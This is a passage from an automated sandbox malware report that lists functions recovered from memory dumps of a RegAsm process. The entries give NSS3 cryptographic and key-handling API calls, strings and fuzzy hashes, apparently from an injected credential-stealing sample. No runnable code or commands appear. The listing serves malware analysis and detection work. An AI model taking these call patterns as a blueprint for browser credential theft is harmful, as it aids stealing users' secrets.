StrCmpCA.SHLWAPI(?,block,?,?,0041769D), ref: 0041392F
ExitProcess.KERNEL32 ref: 0041393A
strtok_s.MSVCRT ref: 0041394B

Strings

block, xrefs: 00413923

Memory Dump Source

Source File: 00000003.00000002.2381814438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381814438.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381814438.000000000066F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: block
API String ID: 3407564107-2199623458
Opcode ID: 067410dc51045581ea1e2f82377180ef6401ea18603fa35106d0825f26194bcd
Instruction ID: 8b9d2823459ccd929644cdf14e3e1e6565c0be49db44fa1716dfbdc59d8e41ea
Opcode Fuzzy Hash: 067410dc51045581ea1e2f82377180ef6401ea18603fa35106d0825f26194bcd
Instruction Fuzzy Hash: E9419770A80306BFDB109F75DC49AA67B68BF0478BF20556BA446D25D0F738D7808B99

Function 6C21CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C21CC7B), ref: 6C21CD7A

Part of subcall function 6C21CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C18C1A8,?), ref: 6C21CE92

PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C21CDA5
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C21CDB8
PR_UnloadLibrary.NSS3(00000000), ref: 6C21CDDB
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C21CD8E

Part of subcall function 6C1405C0: PR_EnterMonitor.NSS3 ref: 6C1405D1
Part of subcall function 6C1405C0: PR_ExitMonitor.NSS3 ref: 6C1405EA

PR_LoadLibrary.NSS3(wship6.dll), ref: 6C21CDE8
PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C21CDFF
PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C21CE16
PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C21CE29
PR_UnloadLibrary.NSS3(00000000), ref: 6C21CE48

Strings

getnameinfo, xrefs: 6C21CDB2, 6C21CE23
ws2_32.dll, xrefs: 6C21CD75
getaddrinfo, xrefs: 6C21CD88, 6C21CDF9
freeaddrinfo, xrefs: 6C21CD9F, 6C21CE10
wship6.dll, xrefs: 6C21CDE3

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
API String ID: 601260978-871931242
Opcode ID: 43989a94195e8c943aba1da4ea02783eae1bc5a50b2ff92e59dec77dfc83a5df
Instruction ID: 0e622a3fc237e1aea4292c902cf80b9144475590540fd8ff4da948ced41823ad
Opcode Fuzzy Hash: 43989a94195e8c943aba1da4ea02783eae1bc5a50b2ff92e59dec77dfc83a5df
Instruction Fuzzy Hash: 181129AEE1711B52EB006A322C04AAE3CD89B1350DF584638ED05D5FC1FB21C54DC3E6

Function 6C194540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON

Download Yara Rule

APIs

PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C194590
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C19471C
TlsGetValue.KERNEL32 ref: 6C19477C
EnterCriticalSection.KERNEL32(?), ref: 6C19479A
PR_SetError.NSS3(FFFFE002,00000000), ref: 6C19484A
PK11_FreeSymKey.NSS3(?), ref: 6C194858
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C19486A
PR_Unlock.NSS3(?), ref: 6C19487E

Part of subcall function 6C1FDD70: TlsGetValue.KERNEL32 ref: 6C1FDD8C
Part of subcall function 6C1FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C1FDDB4

PK11_FreeSymKey.NSS3(?), ref: 6C19488C
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C19489C
PK11_GetInternalSlot.NSS3 ref: 6C1948B2
PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C177F9D), ref: 6C1948EC
SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C19492A
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C194949
PR_SetError.NSS3(00000000,00000000), ref: 6C194977
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C194987
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C19499B

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
String ID:
API String ID: 1673584487-0
Opcode ID: a2037bd23840931f5650c28a42e5ba27a408a8ac9158312c631710ce050fde43
Instruction ID: 1f8a57ad381fc290b5630d6e5f4524350edd80b89628e484dfa4f87fbcd2f9f9
Opcode Fuzzy Hash: a2037bd23840931f5650c28a42e5ba27a408a8ac9158312c631710ce050fde43
Instruction Fuzzy Hash: 94E17DB5D002599FDB20CF14CC44BEEBBB5EF08308F1485A9E829A7751E7729A95CF90

Function 6C1B6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON

Download Yara Rule

APIs

SEC_ASN1DecodeItem_Util.NSS3(?,?,6C281DE0,?), ref: 6C1B6CFE
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C1B6D26
PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C1B6D70
PORT_Alloc_Util.NSS3(00000480), ref: 6C1B6D82
DER_GetInteger_Util.NSS3(?), ref: 6C1B6DA2
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1B6DD8
PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C1B6E60
PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C1B6F19
PK11_DigestBegin.NSS3(00000000), ref: 6C1B6F2D
PK11_DigestOp.NSS3(?,?,00000000), ref: 6C1B6F7B
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C1B7011
PK11_FreeSymKey.NSS3(00000000), ref: 6C1B7033
free.MOZGLUE(?), ref: 6C1B703F
PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C1B7060
SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C1B7087
PR_SetError.NSS3(FFFFE062,00000000), ref: 6C1B70AF

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
String ID:
API String ID: 2108637330-0
Opcode ID: 78597e4d2055cce5eddede4c42d9d44f76bec0bcd62b4a8c1927d82692d74d8d
Instruction ID: 02e47b7b6efb886eeb29e94446e2b21f6768ba539829f99ba44046218c978f2d
Opcode Fuzzy Hash: 78597e4d2055cce5eddede4c42d9d44f76bec0bcd62b4a8c1927d82692d74d8d
Instruction Fuzzy Hash: A9A109719042089BEB089F24DC95B5A32A4DBB130CF24497EF958EBB81E739D845CF93

Function 6C1925D0 Relevance: 24.3, APIs: 16, Instructions: 284COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C16662E,?,?), ref: 6C19264E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C16662E,?,?), ref: 6C192670
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,-00000001,?,?,?,6C16662E,?), ref: 6C192684
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C1926C2
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,?), ref: 6C1926E0
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00000001), ref: 6C1926F4
PR_Unlock.NSS3(?), ref: 6C19274D
PR_SetError.NSS3(00000000,00000000), ref: 6C1928A9

Part of subcall function 6C1A3440: PK11_GetAllTokens.NSS3 ref: 6C1A3481
Part of subcall function 6C1A3440: PR_SetError.NSS3(00000000,00000000), ref: 6C1A34A3
Part of subcall function 6C1A3440: TlsGetValue.KERNEL32 ref: 6C1A352E
Part of subcall function 6C1A3440: EnterCriticalSection.KERNEL32(?), ref: 6C1A3542
Part of subcall function 6C1A3440: PR_Unlock.NSS3(?), ref: 6C1A355B

PR_Unlock.NSS3(?), ref: 6C1927A1
PR_SetError.NSS3(FFFFE040,00000000,?,?,?,?,?,?,-00000001,?,?,?,6C16662E,?,?,?), ref: 6C1927B5
PR_Unlock.NSS3(?), ref: 6C1927CE
TlsGetValue.KERNEL32 ref: 6C1927E8
EnterCriticalSection.KERNEL32(0000001C), ref: 6C192800

Part of subcall function 6C19F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C19F854
Part of subcall function 6C19F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C19F868
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C19F882
Part of subcall function 6C19F820: free.MOZGLUE(04C483FF,?,?), ref: 6C19F889
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C19F8A4
Part of subcall function 6C19F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C19F8AB
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C19F8C9
Part of subcall function 6C19F820: free.MOZGLUE(280F10EC,?,?), ref: 6C19F8D0

PR_Unlock.NSS3(?), ref: 6C192834
TlsGetValue.KERNEL32 ref: 6C19284E
EnterCriticalSection.KERNEL32(0000001C), ref: 6C192866

Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407AD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407CD
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C0D204A), ref: 6C1407D6
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C0D204A), ref: 6C1407E4
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,6C0D204A), ref: 6C140864
Part of subcall function 6C1407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C140880
Part of subcall function 6C1407A0: TlsSetValue.KERNEL32(00000000,?,?,6C0D204A), ref: 6C1408CB
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408D7
Part of subcall function 6C1407A0: TlsGetValue.KERNEL32(?,?,6C0D204A), ref: 6C1408FB

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalSection$Unlock$Enterfree$DeleteError$K11_calloc$ImportPublicTokens
String ID:
API String ID: 544520609-0
Opcode ID: a3869ac7a5f420ce3a73fc7e688fe5662fd2b5062963ce4db1cd2553432a15c0
Instruction ID: e5fcd92a7df15de9b81cec1d35442ef2ff71a7dcbc4fba8bd40a83c2b7ba0e4c
Opcode Fuzzy Hash: a3869ac7a5f420ce3a73fc7e688fe5662fd2b5062963ce4db1cd2553432a15c0
Instruction Fuzzy Hash: 63B1DEB4E002059FDB04EF68D888BAAB7F4FF19308F104529ED15A7B41EB31E955CBA1

Function 6C19E550 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 384COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C19E5A0

Part of subcall function 6C1FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C1FC2BF

memcpy.VCRUNTIME140(?,?,?), ref: 6C19E5F2

Strings

0, xrefs: 6C19EA4D

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ErrorValuememcpy
String ID: 0
API String ID: 3044119603-4108050209
Opcode ID: 664c7a4305b28fd5009bb74784cbe473c889eb497a4441c57d930b59cad59229
Instruction ID: 08f1a1e1ffc1d306e973d9bc3c5c7b07cc03f67fcd0e44cfad69a490a5826181
Opcode Fuzzy Hash: 664c7a4305b28fd5009bb74784cbe473c889eb497a4441c57d930b59cad59229
Instruction Fuzzy Hash: 21F179B1A002299BDB218F24CC84BDAB7B5BF59318F0541A8ED08A7751E775EE94CFD0

Function 6C22A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C22A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C22A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C22A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C22A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C22A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C22A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C22A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C22A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C22A69A

Strings

%s at line %d of [%.10s], xrefs: 6C22A62C
database corruption, xrefs: 6C22A627
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C22A61D, 6C22A68B, 6C22A6B3

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 7ee8c7ddb1828b584b4467bd41b9a7e3bfcbe2d5e5660a0f6e3d555c694590cf
Instruction ID: 58c83379a9b02a8589ee18573a38b6eed8bf75b73591269a1bfa60fdad727b1c
Opcode Fuzzy Hash: 7ee8c7ddb1828b584b4467bd41b9a7e3bfcbe2d5e5660a0f6e3d555c694590cf
Instruction Fuzzy Hash: 8E51B1B1908309EBCB018F26D880A6B7BE0AB44718F04886DFC8947E51F735D994CB92

Function 6C1545B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C151984,?), ref: 6C1545F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C1545FB

Part of subcall function 6C1B0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C1B08B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C15461E

Part of subcall function 6C1AFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C154101,00000000,?,?,?,6C151666,?,?), ref: 6C1AFCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C154646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C154662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C15467A
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C154691
PL_FreeArenaPool.NSS3 ref: 6C1546A3
PL_FinishArenaPool.NSS3 ref: 6C1546AB
free.MOZGLUE(?), ref: 6C1546BC
PORT_ZAlloc_Util.NSS3(?), ref: 6C1546E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C154717

Strings

security, xrefs: 6C1545EC

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: 990097368b21e3376ef13203e285d07fac0d757954f48b2c924bc77bda9c595f
Instruction ID: 0b106906f6a8660b75625e1d47ff486bf98c7f160c5e061862a5abcc1aa5106f
Opcode Fuzzy Hash: 990097368b21e3376ef13203e285d07fac0d757954f48b2c924bc77bda9c595f
Instruction Fuzzy Hash: 4A4102F29053146BE7008B659C44B5B77E8AF5825CF550A28EC29A3B81F730E639CAD6

Function 6C1CAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1CADB1

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C1CADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C1CAE08

Part of subcall function 6C1AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C2818D0,?), ref: 6C1AB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C1CAE25
PL_FreeArenaPool.NSS3 ref: 6C1CAE63
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C1CAE4D

Part of subcall function 6C0D4C70: TlsGetValue.KERNEL32(?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4C97
Part of subcall function 6C0D4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CB0
Part of subcall function 6C0D4C70: PR_Unlock.NSS3(?,?,?,?,?,6C0D3921,6C2B14E4,6C21CC70), ref: 6C0D4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1CAE93
PR_CallOnce.NSS3(6C2B2AA4,6C1B12D0), ref: 6C1CAECC
PL_FreeArenaPool.NSS3 ref: 6C1CAEDE
PL_FinishArenaPool.NSS3 ref: 6C1CAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1CAEF5
PL_FinishArenaPool.NSS3 ref: 6C1CAF16

Strings

security, xrefs: 6C1CADEE

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 531b8fcad8f3d95434ce66d9568cf01fbad4e4bacde7f9364269ec4d1d724904
Instruction ID: cd429476b39b9a6596f546ab76ceb00f7fe3ca06e0ebf231301ca525ba845706
Opcode Fuzzy Hash: 531b8fcad8f3d95434ce66d9568cf01fbad4e4bacde7f9364269ec4d1d724904
Instruction Fuzzy Hash: F5412BB5A0420467E7225B14AC49BAF33B49F7231CF150525F914A6F81FB3DD518CAE7

Function 6C168DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C168E22
EnterCriticalSection.KERNEL32(?), ref: 6C168E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C168E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C168E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C168E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C168EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C168EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C168EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C168F00
free.MOZGLUE(?), ref: 6C168F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C168F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C168F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C168F5B
PR_Unlock.NSS3(?), ref: 6C168F72
PR_Unlock.NSS3(?), ref: 6C168F82

Memory Dump Source

Source File: 00000003.00000002.2415798192.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2415778232.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417123162.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417354470.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417377434.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417401494.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2417495484.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 74006c3130bc902dff4b8714a9a6017e9c2802fe3492c21097aca58204fc7dee
Instruction ID: df67337d3d9bd131daf2596182ba5851177ee6e92db6c18b168aae1b43648b99
Opcode Fuzzy Hash: 74006c3130bc902dff4b8714a9a6017e9c2802fe3492c21097aca58204fc7dee
Instruction Fuzzy Hash: A15128B2E002159FE7009F6ACC8496EB7B9EF56758B154169EC089BF00E731ED54C7E1

Function 6C19EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C19EE0B

